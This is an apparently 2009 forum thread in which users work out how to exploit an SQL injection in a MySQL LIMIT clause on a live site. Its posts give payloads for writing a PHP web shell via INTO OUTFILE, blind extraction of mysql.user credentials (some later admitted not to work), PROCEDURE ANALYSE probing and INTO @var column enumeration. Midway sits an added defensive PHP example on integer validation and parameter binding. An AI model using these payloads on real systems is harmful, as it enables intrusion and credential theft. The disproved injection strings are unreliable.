How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
LIMIT= query be attacked?
Posted by: m4x
Date: January 10, 2009 05:54PM

I can generate a mysql error on a Limit=100 query at the end of a URL, but can it be attacked?

The error looks something like this:
Error: Failed: SELECT * FROM books_read_hiscores WHERE count>=230 ORDER BY count DESC LIMIT 0,100\'

Re: LIMIT= query be attacked?
Posted by: barbarianbob
Date: January 10, 2009 06:39PM

If MySQL is on the same server as PHP and you can control some of the returned text:
Add some PHP code into a row of books_read_hiscores (aka some VARCHAR column that asks for your name), then run

LIMIT 0,100 INTO OUTFILE '../../../../../path/to/htdocs/randomFileName.php'

where the limit grabs the row with the php code.
Then open hxxp://site/randomFileName.php



Edited 2 time(s). Last edit at 01/10/2009 06:40PM by barbarianbob.

Re: LIMIT= query be attacked?
Posted by: Reiners
Date: January 11, 2009 04:46AM

This won't work because magic quotes seem to be enabled and you definitely need quotes for INTO OUTFILE. Maybe I'll come up with a better idea in the next few days when I have my test environment available.

Re: LIMIT= query be attacked?
Posted by: m4x
Date: January 11, 2009 02:59PM

Ok, tell me how you do ;).

Re: LIMIT= query be attacked?
Posted by: backbone
Date: January 12, 2009 07:21PM

I think you would succeed if you were in a lucky position, lucky as in the database being in GBK -> http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string ... that is, if addslashes was used for escaping.

...or maybe find an SQL injection in other places you might have missed :)


Re: LIMIT= query be attacked?
Posted by: Pragmatk
Date: January 14, 2009 01:31PM

LIMIT 0,100 PROCEDURE ANALYSE(15,2000) might be able to give you more errors (we all love errors, right?).

So we have a few options. If it has more than 255 articles to display in the DB, you can do

LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)
LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),1,1)
... etc...
<-- To get the ASCII value of the characters in the string :-)

You could also go for the semi-blind way :)

LIMIT 0,IF(ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)) > 127,1,2)
<-- If it returns 0 results (or an error message), we got an error (like no access to mysql.user, for instance). If it returns 1 result, the ASCII value of the first character in the username is > 127; if it returns 2, it is < 127. Using this method you can get the value of each character in less than 10 queries (which may seem tiresome, but is way more effective than a real bruteforce attack). You can use a tool like sqlmap to automate the process of dumping the info.

etc...

Re: LIMIT= query be attacked?
Posted by: backbone
Date: January 14, 2009 03:27PM

@Pragmatk: would you like to share an instance in which the ANALYSE() procedure would cause a useful error (except for 1108 error messages, which are not useful)? I'm highly skeptical about it...

---
LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)
---

Up to the most recent version of MySQL, I know of none that will accept this type of limit condition...

---
LIMIT 0,IF(ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)) > 127,1,2)
---

o_O I would like to see you testing the above methods.
Before helping other people, try to double-check the things you say, because you'll only end up confusing them.


Re: LIMIT= query be attacked?
Posted by: m4x
Date: January 14, 2009 03:50PM

None of the methods above work :S.

Re: LIMIT= query be attacked?
Posted by: barbarianbob
Date: January 14, 2009 03:53PM

The closest I've gotten is to use PROCEDURE ANALYSE(15,2000), as Pragmatk said, but you can't do much in there, either.

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE(15,2000);
Empty set (0.08 sec)

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT 15),2000);
Empty set (0.01 sec)

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT 14+1),2000);
ERROR 1108 (HY000): Incorrect parameters to procedure 'ANALYSE'

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT IF(1,15,15)),2000);
ERROR 1108 (HY000): Incorrect parameters to procedure 'ANALYSE'

As soon as you do any math (14+1), you get an error. As soon as you try a function, you get an error.
All that's needed to get a blind injection is to run a function, but I've been unable to do so.
Once someone finds a way to execute a function after the LIMIT clause, we will be swimming in vulnerabilities. Since LIMIT doesn't let you put quotes around the number, mysql_real_escape_string() becomes ineffective in blocking the injection. Then it will be free blind injections for everyone.

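The point made above, that escaping does nothing for a number that is never quoted, is easiest to see in code. The following is an added example, not code from the thread or from any of its posters: the table and column names are taken from the error message quoted in the first post, the request inputs are constructed from the probes discussed in the thread, and addslashes() stands in for mysql_real_escape_string() so the script runs without a database connection.

```php
<?php
// Added example, not from the thread. Shows why escaping cannot protect an
// unquoted LIMIT value and what to do instead: strict integer validation,
// then binding the value as an integer through PDO.

// Vulnerable pattern: the value is escaped but never quoted. addslashes()
// stands in for mysql_real_escape_string(); both only touch quotes,
// backslashes and NUL bytes, so everything else reaches MySQL verbatim.
function buildQueryVulnerable(string $limit): string
{
    $escaped = addslashes($limit);
    return "SELECT * FROM books_read_hiscores WHERE count>=230 "
         . "ORDER BY count DESC LIMIT 0,$escaped";
}

// Hardened: accept only a bounded positive integer, reject everything else.
// Returns null for anything that is not a plain integer in [1, $max].
function validateLimit(string $limit, int $max = 100): ?int
{
    $value = filter_var($limit, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => $max],
    ]);
    return $value === false ? null : $value;
}

// With PDO, bind the validated value as PDO::PARAM_INT. Binding it as a
// string would quote it, and MySQL rejects a quoted LIMIT argument.
function fetchHiscores(PDO $pdo, string $limit): array
{
    $n = validateLimit($limit);
    if ($n === null) {
        throw new InvalidArgumentException('limit must be an integer from 1 to 100');
    }
    $stmt = $pdo->prepare('SELECT * FROM books_read_hiscores WHERE count>=230 '
                        . 'ORDER BY count DESC LIMIT 0,?');
    $stmt->bindValue(1, $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs modelled on the probes discussed in this thread.
$inputs = ['100', '100 PROCEDURE ANALYSE(15,2000)', '5 INTO @a,@b', '1e2', '-1', "100'"];
foreach ($inputs as $in) {
    $q = buildQueryVulnerable($in);
    printf("%-32s -> %s\n", var_export($in, true), substr($q, strpos($q, 'LIMIT')));
    printf("%-32s    validated: %s\n", '', var_export(validateLimit($in), true));
}
```

Only the plain `100` survives validateLimit(); every other input, including the quoted one that produced the `LIMIT 0,100\'` error in the first post, is rejected before any SQL is built.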
Re: LIMIT= query be attacked?
Posted by: m4x
Date: January 14, 2009 04:14PM

Hmm, didn't work, damn. PMed you.

Re: LIMIT= query be attacked?
Posted by: Pragmatk
Date: January 21, 2009 03:16PM

Damn, I was mistaken; you guys are right. I'm sorry I sidetracked you there :(
LIMIT is a bitch :/

PROCEDURE ANALYSE is cool though. It doesn't allow subqueries, so I can't imagine many situations where you can use it to return data. In a lot of cases it can be extremely nice for retrieving data about the table and queries, though. For one, it's good for detecting stacked queries. In some (rare) cases you can also get column types "for free" using it.
It's also neat for making sure you have a hole through to a MySQL database in those cases where you are in doubt (especially blind stuff).

Progress :-)
Posted by: Pragmatk
Date: January 25, 2009 09:57AM

I played around with this some more. I don't know how useful it is if you only have this injection point, but you can enumerate the amount of columns.

The procedure is pretty much like UNION SELECT NULL, [NULL ...]:

limit 5 into @version
limit 5 into @version,@version
limit 5 into @version,@version,@version
etc...

Re: LIMIT= query be attacked?
Posted by: Reiners
Date: January 26, 2009 11:28AM

Hm, nice (note that you can name the vars whatever you like; this has nothing to do with @@version), but unfortunately you can't do much with the amount of columns. But I couldn't come up with something better yet :S
PROCEDURE ANALYSE is interesting though, I created a small post about it here:
http://websec.wordpress.com/2009/01/26/mysql-table-and-column-names-update/
I hope credits are fine, else PM me.
Additionally I managed to crash MySQL4 with this operation, but while having a look at the MySQL bug system, this operation caused a lot of trouble in the past, so nothing fancy I guess.



Edited 1 time(s). Last edit at 01/26/2009 11:29AM by Reiners.

Re: LIMIT= query be attacked?
Posted by: Pragmatk
Date: January 30, 2009 03:20PM

I wrote a bit more on extracting data using this.

http://pragmatk.geeksgonewild.info/sql-injection/mysql/2009-01-29/to-the-limit-and-beyond/

Have fun!



Edited 1 time(s). Last edit at 02/01/2009 12:44PM by Pragmatk.
